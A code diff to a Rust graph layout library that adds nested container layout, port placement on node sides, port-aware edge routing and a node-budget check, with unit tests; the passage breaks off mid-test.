+ pub ports: Vec, } /// Display-level information about an edge supplied by the caller. @@ -78,6 +198,10 @@ pub struct NodeInfo { pub struct EdgeInfo { /// Label rendered along the edge path. pub label: String, + /// Source port ID (within source node). `None` = connect to node center. + pub source_port: Option, + /// Target port ID (within target node). `None` = connect to node center. + pub target_port: Option, } /// A positioned node produced by the layout algorithm. @@ -101,6 +225,10 @@ pub struct LayoutNode { pub node_type: String, /// Optional secondary label. pub sublabel: Option, + /// `true` when this node is a container with children laid out inside. + pub is_container: bool, + /// Positioned ports on this node. + pub ports: Vec, } /// A routed edge produced by the layout algorithm. @@ -114,6 +242,10 @@ pub struct LayoutEdge { pub label: String, /// Ordered polyline waypoints `(x, y)`. pub points: Vec<(f64, f64)>, + /// Source port ID if edge connects to a specific port. + pub source_port: Option, + /// Target port ID if edge connects to a specific port. + pub target_port: Option, } /// Complete layout result. @@ -158,12 +290,51 @@ pub fn layout( }; } + // Budget check: bail out if the graph exceeds the node limit. + if options + .max_nodes + .is_some_and(|max| graph.node_count() > max) + { + let max = options.max_nodes.unwrap(); + return GraphLayout { + nodes: vec![LayoutNode { + id: "__budget_exceeded__".into(), + label: format!( + "Graph has {} nodes (budget: {}). Use type filters or focus on a specific artifact.", + graph.node_count(), + max + ), + x: 0.0, + y: 0.0, + width: 500.0, + height: 60.0, + rank: 0, + node_type: String::new(), + sublabel: None, + is_container: false, + ports: Vec::new(), + }], + edges: Vec::new(), + width: 500.0, + height: 60.0, + }; + } + // Collect node info up-front so we can reference it throughout. let infos: HashMap = graph .node_indices() .map(|idx| (idx, node_info(idx, &graph[idx]))) .collect(); + // Check if this is a compound graph (any node has a parent). + let has_compound = infos.values().any(|info| info.parent.is_some()); + + if has_compound { + return layout_compound(graph, &infos, edge_info, options); + } + + // --- Flat layout (original algorithm) --- + // Build NodeIndex → id map for edge routing. let idx_to_id: HashMap = infos .iter() @@ -181,7 +352,8 @@ pub fn layout( } // Phase 3 — coordinate assignment. - let (layout_nodes, total_w, total_h) = assign_coordinates(&rank_lists, &infos, &ranks, options); + let (layout_nodes, total_w, total_h) = + assign_coordinates(&rank_lists, &infos, &ranks, options, &HashMap::new()); // Phase 4 — edge routing. let layout_edges = route_edges(graph, edge_info, &layout_nodes, &idx_to_id, options); @@ -382,74 +554,249 @@ fn sweep_up( // Phase 3: Coordinate assignment // --------------------------------------------------------------------------- +/// Per-node size, accounting for container overrides and port counts. +fn node_size( + idx: NodeIndex, + options: &LayoutOptions, + size_overrides: &HashMap, + infos: &HashMap, +) -> (f64, f64) { + if let Some(&size) = size_overrides.get(&idx) { + return size; + } + let base_w = options.node_width; + let mut base_h = options.node_height; + + // Grow height if ports need more space (12px per port + 8px padding) + if let Some(info) = infos.get(&idx) { + let (left, right) = resolved_side_counts(&info.ports); + let max_side = left.max(right); + if max_side > 0 { + let port_h = max_side as f64 * 12.0 + 8.0; + base_h = base_h.max(port_h); + } + } + + (base_w, base_h) +} + fn assign_coordinates( rank_lists: &[Vec], infos: &HashMap, ranks: &HashMap, options: &LayoutOptions, + size_overrides: &HashMap, ) -> (Vec, f64, f64) { let mut nodes: Vec = Vec::new(); let mut max_x: f64 = 0.0; let mut max_y: f64 = 0.0; - // Compute the maximum rank width so we can center narrower ranks. + // Compute per-rank width and height (max node height determines rank spacing). let rank_widths: Vec = rank_lists .iter() .map(|list| { if list.is_empty() { - 0.0 - } else { - list.len() as f64 * options.node_width - + (list.len() as f64 - 1.0) * options.node_separation + return 0.0; } + let total_w: f64 = list + .iter() + .map(|&idx| node_size(idx, options, size_overrides, infos).0) + .sum(); + total_w + (list.len() as f64 - 1.0) * options.node_separation + }) + .collect(); + + let rank_heights: Vec = rank_lists + .iter() + .map(|list| { + list.iter() + .map(|&idx| node_size(idx, options, size_overrides, infos).1) + .fold(options.node_height, f64::max) }) .collect(); let global_max_width = rank_widths.iter().cloned().fold(0.0f64, f64::max); + // Cumulative Y offset per rank (for variable-height ranks). + let mut rank_y: Vec = Vec::with_capacity(rank_lists.len()); + let mut cum_y = 0.0; + for (i, _) in rank_lists.iter().enumerate() { + rank_y.push(cum_y); + cum_y += rank_heights[i] + options.rank_separation; + } + for (rank, list) in rank_lists.iter().enumerate() { let rank_width = rank_widths[rank]; let x_offset = (global_max_width - rank_width) / 2.0; - for (pos, &idx) in list.iter().enumerate() { + let mut x_cursor = x_offset; + for &idx in list { let info = &infos[&idx]; + let (nw, nh) = node_size(idx, options, size_overrides, infos); + let is_container = size_overrides.contains_key(&idx); + let (x, y) = match options.rank_direction { RankDirection::TopToBottom => { - let x = x_offset + pos as f64 * (options.node_width + options.node_separation); - let y = rank as f64 * (options.node_height + options.rank_separation); - (x, y) + // Center node vertically within its rank row. + let y = rank_y[rank] + (rank_heights[rank] - nh) / 2.0; + (x_cursor, y) } RankDirection::LeftToRight => { - let x = rank as f64 * (options.node_width + options.rank_separation); - let y = x_offset + pos as f64 * (options.node_height + options.node_separation); - (x, y) + let x = rank_y[rank] + (rank_heights[rank] - nw) / 2.0; + (x, x_cursor) } }; - if x + options.node_width > max_x { - max_x = x + options.node_width; + if x + nw > max_x { + max_x = x + nw; } - if y + options.node_height > max_y { - max_y = y + options.node_height; + if y + nh > max_y { + max_y = y + nh; } - nodes.push(LayoutNode { + let mut layout_node = LayoutNode { id: info.id.clone(), x, y, - width: options.node_width, - height: options.node_height, + width: nw, + height: nh, rank: *ranks.get(&idx).unwrap_or(&rank), label: info.label.clone(), node_type: info.node_type.clone(), sublabel: info.sublabel.clone(), - }); + is_container, + ports: Vec::new(), + }; + layout_node.ports = position_ports(&layout_node, &info.ports); + nodes.push(layout_node); + + x_cursor += nw + options.node_separation; } } (nodes, max_x, max_y) } +// --------------------------------------------------------------------------- +// Port positioning +// --------------------------------------------------------------------------- + +/// Compute positioned ports for a laid-out node. +fn position_ports(node: &LayoutNode, ports: &[PortInfo]) -> Vec { + if ports.is_empty() { + return Vec::new(); + } + + // Resolve Auto sides based on direction + let resolved_side = |p: &PortInfo| -> PortSide { + match p.side { + PortSide::Auto => match p.direction { + PortDirection::In => PortSide::Left, + PortDirection::Out | PortDirection::InOut => PortSide::Right, + }, + other => other, + } + }; + + let mut left: Vec<&PortInfo> = Vec::new(); + let mut right: Vec<&PortInfo> = Vec::new(); + let mut top: Vec<&PortInfo> = Vec::new(); + let mut bottom: Vec<&PortInfo> = Vec::new(); + + for p in ports { + match resolved_side(p) { + PortSide::Left => left.push(p), + PortSide::Right => right.push(p), + PortSide::Top => top.push(p), + PortSide::Bottom => bottom.push(p), + PortSide::Auto => unreachable!(), + } + } + + let mut result = Vec::new(); + + // Place ports evenly along each side + let place_vertical = + |ports: &[&PortInfo], fixed_x: f64, y_start: f64, y_len: f64| -> Vec { + let n = ports.len(); + if n == 0 { + return vec![]; + } + let spacing = y_len / (n as f64 + 1.0); + ports + .iter() + .enumerate() + .map(|(i, p)| LayoutPort { + id: p.id.clone(), + label: p.label.clone(), + x: fixed_x, + y: y_start + spacing * (i as f64 + 1.0), + side: resolved_side(p), + direction: p.direction, + port_type: p.port_type, + }) + .collect() + }; + + let place_horizontal = + |ports: &[&PortInfo], fixed_y: f64, x_start: f64, x_len: f64| -> Vec { + let n = ports.len(); + if n == 0 { + return vec![]; + } + let spacing = x_len / (n as f64 + 1.0); + ports + .iter() + .enumerate() + .map(|(i, p)| LayoutPort { + id: p.id.clone(), + label: p.label.clone(), + x: x_start + spacing * (i as f64 + 1.0), + y: fixed_y, + side: resolved_side(p), + direction: p.direction, + port_type: p.port_type, + }) + .collect() + }; + + result.extend(place_vertical(&left, node.x, node.y, node.height)); + result.extend(place_vertical( + &right, + node.x + node.width, + node.y, + node.height, + )); + result.extend(place_horizontal(&top, node.y, node.x, node.width)); + result.extend(place_horizontal( + &bottom, + node.y + node.height, + node.x, + node.width, + )); + + result +} + +/// Count ports per side after resolving Auto, returns (left, right). +#[allow(dead_code)] +fn resolved_side_counts(ports: &[PortInfo]) -> (usize, usize) { + let mut left = 0usize; + let mut right = 0usize; + for p in ports { + match p.side { + PortSide::Left => left += 1, + PortSide::Right => right += 1, + PortSide::Auto => match p.direction { + PortDirection::In => left += 1, + PortDirection::Out | PortDirection::InOut => right += 1, + }, + _ => {} // Top/Bottom don't affect height + } + } + (left, right) +} + // --------------------------------------------------------------------------- // Phase 4: Edge routing // --------------------------------------------------------------------------- @@ -490,13 +837,51 @@ fn route_edges( None => continue, }; - let points = compute_waypoints(src_node, tgt_node, options); + // If ports are specified, snap to port positions + let src_point = info + .source_port + .as_ref() + .and_then(|pid| src_node.ports.iter().find(|p| p.id == *pid)) + .map(|p| (p.x, p.y)); + let tgt_point = info + .target_port + .as_ref() + .and_then(|pid| tgt_node.ports.iter().find(|p| p.id == *pid)) + .map(|p| (p.x, p.y)); + + // Compute start/end points (port-aware or center-based) + let start = src_point.unwrap_or_else(|| { + ( + src_node.x + src_node.width / 2.0, + src_node.y + src_node.height, + ) + }); + let end = tgt_point.unwrap_or_else(|| (tgt_node.x + tgt_node.width / 2.0, tgt_node.y)); + + let points = match options.edge_routing { + EdgeRouting::Orthogonal => crate::ortho::route_orthogonal( + layout_nodes, + start, + end, + options.bend_penalty, + options.port_stub_length, + ), + EdgeRouting::CubicBezier => { + if src_point.is_some() || tgt_point.is_some() { + vec![start, end] + } else { + compute_waypoints(src_node, tgt_node, options) + } + } + }; edges.push(LayoutEdge { source_id: src_id.clone(), target_id: tgt_id.clone(), label: info.label, points, + source_port: info.source_port, + target_port: info.target_port, }); } @@ -540,6 +925,324 @@ fn compute_waypoints( points } +// --------------------------------------------------------------------------- +// Compound (nested/hierarchical) layout +// --------------------------------------------------------------------------- + +/// Recursive bottom-up compound layout. +/// +/// 1. Build containment tree from `NodeInfo::parent`. +/// 2. Bottom-up: lay out each container's children using Sugiyama, then size +/// the container to fit its children + padding + header. +/// 3. Lay out root-level nodes (some with variable sizes) using Sugiyama. +/// 4. Translate all children to absolute coordinates. +/// 5. Route edges globally. +fn layout_compound( + graph: &Graph, + infos: &HashMap, + edge_info: &impl Fn(EdgeIndex, &E) -> EdgeInfo, + options: &LayoutOptions, +) -> GraphLayout { + let id_to_idx: HashMap<&str, NodeIndex> = infos + .iter() + .map(|(&idx, info)| (info.id.as_str(), idx)) + .collect(); + + // Build children map: parent_idx → [child_idx, ...] + let mut children_of: HashMap> = HashMap::new(); + let mut root_nodes: Vec = Vec::new(); + + for (&idx, info) in infos { + match &info.parent { + Some(parent_id) => { + if let Some(&parent_idx) = id_to_idx.get(parent_id.as_str()) { + children_of.entry(parent_idx).or_default().push(idx); + } else { + root_nodes.push(idx); // parent not found, treat as root + } + } + None => root_nodes.push(idx), + } + } + + root_nodes.sort_by(|a, b| infos[a].id.cmp(&infos[b].id)); + + // Find all containers and determine depth (for bottom-up ordering). + let containers: Vec = children_of.keys().copied().collect(); + let container_depths = compute_container_depths(&containers, infos, &id_to_idx); + + // Sort containers by depth (deepest first = bottom-up). + let mut sorted_containers: Vec = containers.clone(); + sorted_containers.sort_by(|a, b| { + container_depths + .get(b) + .cmp(&container_depths.get(a)) + .then_with(|| infos[a].id.cmp(&infos[b].id)) + }); + + // Bottom-up: lay out each container's children, compute sizes. + let mut container_sizes: HashMap = HashMap::new(); + let mut child_layouts: HashMap> = HashMap::new(); + let pad = options.container_padding; + let hdr = options.container_header; + + for &container_idx in &sorted_containers { + let children = match children_of.get(&container_idx) { + Some(c) => c, + None => continue, + }; + + // Build sub-graph of just these children. + let child_set: std::collections::HashSet = children.iter().copied().collect(); + let mut sub_graph: Graph = Graph::new(); + let mut orig_to_sub: HashMap = HashMap::new(); + + for &child_idx in children { + let sub_idx = sub_graph.add_node(child_idx); + orig_to_sub.insert(child_idx, sub_idx); + } + + // Add edges between children (skip edges to nodes outside this container). + for edge in graph.edge_references() { + let src = edge.source(); + let tgt = edge.target(); + if child_set.contains(&src) + && child_set.contains(&tgt) + && let (Some(&s), Some(&t)) = (orig_to_sub.get(&src), orig_to_sub.get(&tgt)) + { + sub_graph.add_edge(s, t, ()); + } + } + + // Build infos for sub-graph nodes (map sub_idx → original info). + let sub_infos: HashMap = sub_graph + .node_indices() + .map(|sub_idx| { + let orig_idx = sub_graph[sub_idx]; + (sub_idx, infos[&orig_idx].clone()) + }) + .collect(); + + // Sub-nodes that are themselves containers get their computed sizes. + let mut sub_sizes: HashMap = HashMap::new(); + for &sub_idx in sub_infos.keys() { + let orig_idx = sub_graph[sub_idx]; + if let Some(&size) = container_sizes.get(&orig_idx) { + sub_sizes.insert(sub_idx, size); + } + } + + // Run flat layout on the sub-graph. + let sub_ranks = assign_ranks(&sub_graph, &sub_infos, options); + let mut sub_rank_lists = build_rank_lists(&sub_graph, &sub_ranks); + for _ in 0..4 { + sweep_down(&sub_graph, &mut sub_rank_lists, &sub_ranks); + sweep_up(&sub_graph, &mut sub_rank_lists, &sub_ranks); + } + let (mut sub_nodes, sub_w, sub_h) = + assign_coordinates(&sub_rank_lists, &sub_infos, &sub_ranks, options, &sub_sizes); + + // Map sub-graph IDs back to original IDs and store child layouts. + // Sub-graph nodes are in relative coordinates (origin at 0,0). + // Merge any grandchild layouts into the flat list. + let mut all_children_nodes: Vec = Vec::new(); + for sub_node in &mut sub_nodes { + let orig_idx_opt = sub_graph + .node_indices() + .find(|&si| sub_infos[&si].id == sub_node.id); + if let Some(sub_idx) = orig_idx_opt { + let orig_idx = sub_graph[sub_idx]; + // If this child is itself a container, pull its laid-out children + // and translate them relative to this child's position. + if let Some(grandchildren) = child_layouts.remove(&orig_idx) { + let offset_x = sub_node.x + pad; + let offset_y = sub_node.y + hdr; + for mut gc in grandchildren { + gc.x += offset_x; + gc.y += offset_y; + all_children_nodes.push(gc); + } + } + } + all_children_nodes.push(sub_node.clone()); + } + + // Container size = content + padding + header. + let container_w = sub_w + pad * 2.0; + let container_h = sub_h + pad + hdr; + container_sizes.insert( + container_idx, + ( + container_w.max(options.node_width), + container_h.max(options.node_height), + ), + ); + child_layouts.insert(container_idx, all_children_nodes); + } + + // Now lay out the root level with variable sizes for containers. + let root_set: std::collections::HashSet = root_nodes.iter().copied().collect(); + let mut root_graph: Graph = Graph::new(); + let mut orig_to_root: HashMap = HashMap::new(); + + for &root_idx in &root_nodes { + let r_idx = root_graph.add_node(root_idx); + orig_to_root.insert(root_idx, r_idx); + } + + // Add edges between root-level nodes. + // An edge between two nodes in different root-level subtrees + // becomes an edge between their root ancestors. + for edge in graph.edge_references() { + let src_root = find_root_ancestor(edge.source(), infos, &id_to_idx); + let tgt_root = find_root_ancestor(edge.target(), infos, &id_to_idx); + if src_root != tgt_root + && root_set.contains(&src_root) + && root_set.contains(&tgt_root) + && let (Some(&s), Some(&t)) = (orig_to_root.get(&src_root), orig_to_root.get(&tgt_root)) + { + // Avoid duplicate edges. + if !root_graph.contains_edge(s, t) { + root_graph.add_edge(s, t, ()); + } + } + } + + let root_infos: HashMap = root_graph + .node_indices() + .map(|r_idx| { + let orig_idx = root_graph[r_idx]; + (r_idx, infos[&orig_idx].clone()) + }) + .collect(); + + let mut root_sizes: HashMap = HashMap::new(); + for &r_idx in root_infos.keys() { + let orig_idx = root_graph[r_idx]; + if let Some(&size) = container_sizes.get(&orig_idx) { + root_sizes.insert(r_idx, size); + } + } + + let root_ranks = assign_ranks(&root_graph, &root_infos, options); + let mut root_rank_lists = build_rank_lists(&root_graph, &root_ranks); + for _ in 0..4 { + sweep_down(&root_graph, &mut root_rank_lists, &root_ranks); + sweep_up(&root_graph, &mut root_rank_lists, &root_ranks); + } + let (root_layout_nodes, total_w, total_h) = assign_coordinates( + &root_rank_lists, + &root_infos, + &root_ranks, + options, + &root_sizes, + ); + + // Build final node list: root nodes + translated children. + let mut all_nodes: Vec = Vec::new(); + + for root_node in &root_layout_nodes { + // Find original index for this root node. + let orig_idx = root_graph + .node_indices() + .find(|&ri| root_infos[&ri].id == root_node.id) + .map(|ri| root_graph[ri]); + + if let Some(orig_idx) = orig_idx + && let Some(children) = child_layouts.remove(&orig_idx) + { + // Translate children to be inside this container. + let offset_x = root_node.x + pad; + let offset_y = root_node.y + hdr; + for mut child in children { + child.x += offset_x; + child.y += offset_y; + all_nodes.push(child); + } + } + + all_nodes.push(root_node.clone()); + } + + // Route edges globally using final positions. + let idx_to_id: HashMap = infos + .iter() + .map(|(&idx, info)| (idx, info.id.clone())) + .collect(); + let layout_edges = route_edges(graph, edge_info, &all_nodes, &idx_to_id, options); + + GraphLayout { + nodes: all_nodes, + edges: layout_edges, + width: total_w, + height: total_h, + } +} + +/// Compute nesting depth for each container (0 = no parent, 1 = parent is root, etc.). +fn compute_container_depths( + containers: &[NodeIndex], + infos: &HashMap, + id_to_idx: &HashMap<&str, NodeIndex>, +) -> HashMap { + let container_set: std::collections::HashSet = containers.iter().copied().collect(); + let mut depths: HashMap = HashMap::new(); + + fn depth_of( + idx: NodeIndex, + infos: &HashMap, + id_to_idx: &HashMap<&str, NodeIndex>, + container_set: &std::collections::HashSet, + cache: &mut HashMap, + ) -> usize { + if let Some(&d) = cache.get(&idx) { + return d; + } + let d = match &infos[&idx].parent { + Some(parent_id) => { + if let Some(&parent_idx) = id_to_idx.get(parent_id.as_str()) { + if container_set.contains(&parent_idx) { + 1 + depth_of(parent_idx, infos, id_to_idx, container_set, cache) + } else { + 0 + } + } else { + 0 + } + } + None => 0, + }; + cache.insert(idx, d); + d + } + + for &idx in containers { + depth_of(idx, infos, id_to_idx, &container_set, &mut depths); + } + depths +} + +/// Walk up parent chain to find the root-level ancestor. +fn find_root_ancestor( + idx: NodeIndex, + infos: &HashMap, + id_to_idx: &HashMap<&str, NodeIndex>, +) -> NodeIndex { + let mut current = idx; + loop { + match &infos[¤t].parent { + Some(parent_id) => { + if let Some(&parent_idx) = id_to_idx.get(parent_id.as_str()) { + current = parent_idx; + } else { + return current; + } + } + None => return current, + } + } +} + // --------------------------------------------------------------------------- // Tests // --------------------------------------------------------------------------- @@ -555,12 +1258,16 @@ mod tests { label: label.to_string(), node_type: "default".into(), sublabel: None, + parent: None, + ports: vec![], } } fn simple_edge_info(_idx: EdgeIndex, label: &&str) -> EdgeInfo { EdgeInfo { label: label.to_string(), + source_port: None, + target_port: None, } } @@ -717,6 +1424,319 @@ mod tests { assert!(node_a.x < node_b.x); } + // ----------------------------------------------------------------------- + // Compound (nested) layout tests + // ----------------------------------------------------------------------- + + #[test] + fn compound_one_level_nesting() { + // Container S with two children A, B inside; edge A→B. + let mut g = Graph::new(); + let _s = g.add_node("S"); + let a = g.add_node("A"); + let b = g.add_node("B"); + g.add_edge(a, b, "ab"); + + let result = layout( + &g, + &|_idx, n: &&str| NodeInfo { + id: n.to_string(), + label: n.to_string(), + node_type: "default".into(), + sublabel: None, + parent: if *n == "A" || *n == "B" { + Some("S".into()) + } else { + None + }, + ports: vec![], + }, + &simple_edge_info, + &LayoutOptions::default(), + ); + + // Should have 3 nodes: S (container), A, B. + assert_eq!(result.nodes.len(), 3); + + let node_s = result.nodes.iter().find(|n| n.id == "S").unwrap(); + let node_a = result.nodes.iter().find(|n| n.id == "A").unwrap(); + let node_b = result.nodes.iter().find(|n| n.id == "B").unwrap(); + + // S must be a container. + assert!(node_s.is_container, "S should be a container"); + assert!(!node_a.is_container); + assert!(!node_b.is_container); + + // Children must be positioned inside the container. + assert!(node_a.x >= node_s.x, "A.x should be inside S"); + assert!(node_a.y >= node_s.y, "A.y should be inside S"); + assert!(node_b.x >= node_s.x, "B.x should be inside S"); + assert!(node_b.y >= node_s.y, "B.y should be inside S"); + + // Container must be large enough to contain children. + assert!( + node_s.width > 0.0 && node_s.height > 0.0, + "container should have positive size" + ); + let s_right = node_s.x + node_s.width; + let s_bottom = node_s.y + node_s.height; + assert!( + node_a.x + node_a.width <= s_right + 1.0, + "A right edge should be inside S" + ); + assert!( + node_b.x + node_b.width <= s_right + 1.0, + "B right edge should be inside S" + ); + assert!( + node_b.y + node_b.height <= s_bottom + 1.0, + "B bottom edge should be inside S" + ); + } + + #[test] + fn compound_two_level_nesting() { + // Root R contains P; P contains T1, T2; edge T1→T2. + let mut g = Graph::new(); + let _r = g.add_node("R"); + let _p = g.add_node("P"); + let t1 = g.add_node("T1"); + let t2 = g.add_node("T2"); + g.add_edge(t1, t2, "link"); + + let result = layout( + &g, + &|_idx, n: &&str| NodeInfo { + id: n.to_string(), + label: n.to_string(), + node_type: "default".into(), + sublabel: None, + parent: match *n { + "P" => Some("R".into()), + "T1" | "T2" => Some("P".into()), + _ => None, + }, + ports: vec![], + }, + &simple_edge_info, + &LayoutOptions::default(), + ); + + assert_eq!(result.nodes.len(), 4); + + let node_r = result.nodes.iter().find(|n| n.id == "R").unwrap(); + let node_p = result.nodes.iter().find(|n| n.id == "P").unwrap(); + let node_t1 = result.nodes.iter().find(|n| n.id == "T1").unwrap(); + let node_t2 = result.nodes.iter().find(|n| n.id == "T2").unwrap(); + + // Both R and P are containers. + assert!(node_r.is_container); + assert!(node_p.is_container); + assert!(!node_t1.is_container); + assert!(!node_t2.is_container); + + // P must be inside R. + assert!(node_p.x >= node_r.x); + assert!(node_p.y >= node_r.y); + + // T1 and T2 must be inside P. + assert!(node_t1.x >= node_p.x); + assert!(node_t1.y >= node_p.y); + assert!(node_t2.x >= node_p.x); + assert!(node_t2.y >= node_p.y); + + // Transitive: T1, T2 must also be inside R. + assert!(node_t1.x >= node_r.x); + assert!(node_t1.y >= node_r.y); + } + + #[test] + fn compound_sibling_containers() { + // Two sibling containers P1, P2 at root level, each with one child. + let mut g = Graph::new(); + let _p1 = g.add_node("P1"); + let _p2 = g.add_node("P2"); + let a = g.add_node("A"); + let b = g.add_node("B"); + g.add_edge(a, b, "cross"); + + let result = layout( + &g, + &|_idx, n: &&str| NodeInfo { + id: n.to_string(), + label: n.to_string(), + node_type: "default".into(), + sublabel: None, + parent: match *n { + "A" => Some("P1".into()), + "B" => Some("P2".into()), + _ => None, + }, + ports: vec![], + }, + &simple_edge_info, + &LayoutOptions::default(), + ); + + let node_p1 = result.nodes.iter().find(|n| n.id == "P1").unwrap(); + let node_p2 = result.nodes.iter().find(|n| n.id == "P2").unwrap(); + let node_a = result.nodes.iter().find(|n| n.id == "A").unwrap(); + let node_b = result.nodes.iter().find(|n| n.id == "B").unwrap(); + + assert!(node_p1.is_container); + assert!(node_p2.is_container); + + // A inside P1, B inside P2. + assert!(node_a.x >= node_p1.x); + assert!(node_b.x >= node_p2.x); + + // Cross-container edge should exist. + assert_eq!(result.edges.len(), 1); + assert_eq!(result.edges[0].source_id, "A"); + assert_eq!(result.edges[0].target_id, "B"); + } + + #[test] + fn compound_container_larger_than_leaf() { + // A container with 3 children should be wider/taller than default leaf size. + let mut g = Graph::new(); + let _s = g.add_node("S"); + let a = g.add_node("A"); + let b = g.add_node("B"); + let c = g.add_node("C"); + g.add_edge(a, b, "ab"); + g.add_edge(b, c, "bc"); + + let opts = LayoutOptions::default(); + + let result = layout( + &g, + &|_idx, n: &&str| NodeInfo { + id: n.to_string(), + label: n.to_string(), + node_type: "default".into(), + sublabel: None, + parent: if *n != "S" { Some("S".into()) } else { None }, + ports: vec![], + }, + &simple_edge_info, + &opts, + ); + + let node_s = result.nodes.iter().find(|n| n.id == "S").unwrap(); + + // Container must be larger than a default leaf node. + assert!( + node_s.width > opts.node_width, + "container width {} should exceed default {}", + node_s.width, + opts.node_width + ); + assert!( + node_s.height > opts.node_height, + "container height {} should exceed default {}", + node_s.height, + opts.node_height + ); + } + + #[test] + fn compound_mixed_root_and_container() { + // Mix of root-level leaf nodes and containers. + let mut g = Graph::new(); + let _s = g.add_node("S"); + let a = g.add_node("A"); + let b = g.add_node("B"); + let leaf = g.add_node("Leaf"); + g.add_edge(a, b, "ab"); + g.add_edge(_s, leaf, "s-leaf"); + + let result = layout( + &g, + &|_idx, n: &&str| NodeInfo { + id: n.to_string(), + label: n.to_string(), + node_type: "default".into(), + sublabel: None, + parent: match *n { + "A" | "B" => Some("S".into()), + _ => None, + }, + ports: vec![], + }, + &simple_edge_info, + &LayoutOptions::default(), + ); + + // All 4 nodes should be present. + assert_eq!(result.nodes.len(), 4); + + let node_s = result.nodes.iter().find(|n| n.id == "S").unwrap(); + let node_leaf = result.nodes.iter().find(|n| n.id == "Leaf").unwrap(); + + assert!(node_s.is_container); + assert!(!node_leaf.is_container); + } + + #[test] + fn layout_is_deterministic() { + let mut g = Graph::new(); + let a = g.add_node("A"); + let b = g.add_node("B"); + let c = g.add_node("C"); + let d = g.add_node("D"); + let e = g.add_node("E"); + g.add_edge(a, b, "ab"); + g.add_edge(a, c, "ac"); + g.add_edge(b, d, "bd"); + g.add_edge(c, d, "cd"); + g.add_edge(d, e, "de"); + + let opts = LayoutOptions::default(); + let first = layout(&g, &simple_node_info, &simple_edge_info, &opts); + + for _ in 0..10 { + let result = layout(&g, &simple_node_info, &simple_edge_info, &opts); + assert_eq!(first.nodes.len(), result.nodes.len()); + for (a, b) in first.nodes.iter().zip(result.nodes.iter()) { + assert_eq!(a.id, b.id); + assert!((a.x - b.x).abs() < 0.001, "x mismatch for {}", a.id); + assert!((a.y - b.y).abs() < 0.001, "y mismatch for {}", a.id); + } + } + } + + #[test] + fn compound_layout_is_deterministic() { + let mut g = Graph::new(); + let _s = g.add_node("S"); + let a = g.add_node("A"); + let b = g.add_node("B"); + let c = g.add_node("C"); + g.add_edge(a, b, "ab"); + g.add_edge(b, c, "bc"); + + let node_info = |_idx: NodeIndex, n: &&str| NodeInfo { + id: n.to_string(), + label: n.to_string(), + node_type: "default".into(), + sublabel: None, + parent: if *n != "S" { Some("S".into()) } else { None }, + ports: vec![], + }; + + let first = layout(&g, &node_info, &simple_edge_info, &LayoutOptions::default()); + + for _ in 0..10 { + let result = layout(&g, &node_info, &simple_edge_info, &LayoutOptions::default()); + for (a, b) in first.nodes.iter().zip(result.nodes.iter()) { + assert_eq!(a.id, b.id); + assert!((a.x - b.x).abs() < 0.001, "x mismatch for {}", a.id); + assert!((a.y - b.y).abs() < 0.001, "y mismatch for {}", a.id); + } + } + } + #[test] fn multi_rank_edge_waypoints() { let mut g = Graph::new(); @@ -743,4 +1763,254 @@ mod tests { // A->C spans ranks 0..2, so should have 3 waypoints (start, mid, end). assert_eq!(long_edge.points.len(), 3); } + + // ----------------------------------------------------------------------- + // Port positioning tests + // ----------------------------------------------------------------------- + + #[test] + fn ports_positioned_on_node_sides() { + let mut g = Graph::new(); + let _a = g.add_node("A"); + + let result = layout( + &g, + &|_idx, _n: &&str| NodeInfo { + id: "A".into(), + label: "A".into(), + node_type: "default".into(), + sublabel: None, + parent: None, + ports: vec![ + PortInfo { + id: "in1".into(), + label: "in1".into(), + side: PortSide::Left, + direction: PortDirection::In, + port_type: PortType::Data, + }, + PortInfo { + id: "out1".into(), + label: "out1".into(), + side: PortSide::Right, + direction: PortDirection::Out, + port_type: PortType::Data, + }, + ], + }, + &simple_edge_info, + &LayoutOptions::default(), + ); + + let node = &result.nodes[0]; + assert_eq!(node.ports.len(), 2); + + let in_port = node.ports.iter().find(|p| p.id == "in1").unwrap(); + let out_port = node.ports.iter().find(|p| p.id == "out1").unwrap(); + + // Left port at node's left edge + assert!( + (in_port.x - node.x).abs() < 1.0, + "in1 should be on left edge" + ); + // Right port at node's right edge + assert!( + (out_port.x - (node.x + node.width)).abs() < 1.0, + "out1 should be on right edge" + ); + // Both vertically within the node + assert!(in_port.y > node.y && in_port.y < node.y + node.height); + assert!(out_port.y > node.y && out_port.y < node.y + node.height); + } + + #[test] + fn auto_ports_resolve_by_direction() { + let mut g = Graph::new(); + let _a = g.add_node("A"); + + let result = layout( + &g, + &|_idx, _n: &&str| NodeInfo { + id: "A".into(), + label: "A".into(), + node_type: "default".into(), + sublabel: None, + parent: None, + ports: vec![ + PortInfo { + id: "auto_in".into(), + label: "auto_in".into(), + side: PortSide::Auto, + direction: PortDirection::In, + port_type: PortType::Data, + }, + PortInfo { + id: "auto_out".into(), + label: "auto_out".into(), + side: PortSide::Auto, + direction: PortDirection::Out, + port_type: PortType::Event, + }, + ], + }, + &simple_edge_info, + &LayoutOptions::default(), + ); + + let node = &result.nodes[0]; + let in_port = node.ports.iter().find(|p| p.id == "auto_in").unwrap(); + let out_port = node.ports.iter().find(|p| p.id == "auto_out").unwrap(); + + // Auto+In resolves to Left + assert_eq!(in_port.side, PortSide::Left); + assert!((in_port.x - node.x).abs() < 1.0); + // Auto+Out resolves to Right + assert_eq!(out_port.side, PortSide::Right); + assert!((out_port.x - (node.x + node.width)).abs() < 1.0); + } + + #[test] + fn node_grows_for_many_ports() { + let mut g = Graph::new(); + let _a = g.add_node("A"); + + let ports: Vec = (0..6) + .map(|i| PortInfo { + id: format!("p{i}"), + label: format!("port_{i}"), + side: PortSide::Left, + direction: PortDirection::In, + port_type: PortType::Data, + }) + .collect(); + + let result = layout( + &g, + &|_idx, _n: &&str| NodeInfo { + id: "A".into(), + label: "A".into(), + node_type: "default".into(), + sublabel: None, + parent: None, + ports: ports.clone(), + }, + &simple_edge_info, + &LayoutOptions::default(), + ); + + let node = &result.nodes[0]; + // 6 ports * 12px + 8px = 80px > default 50px + assert!( + node.height >= 80.0, + "node should grow for 6 ports, got {}", + node.height + ); + assert_eq!(node.ports.len(), 6); + } + + #[test] + fn edge_connects_to_ports() { + let mut g = Graph::new(); + let a = g.add_node("A"); + let b = g.add_node("B"); + g.add_edge(a, b, "conn"); + + let result = layout( + &g, + &|_idx, n: &&str| NodeInfo { + id: n.to_string(), + label: n.to_string(), + node_type: "default".into(), + sublabel: None, + parent: None, + ports: vec![ + PortInfo { + id: format!("{n}_out"), + label: "out".into(), + side: PortSide::Right, + direction: PortDirection::Out, + port_type: PortType::Data, + }, + PortInfo { + id: format!("{n}_in"), + label: 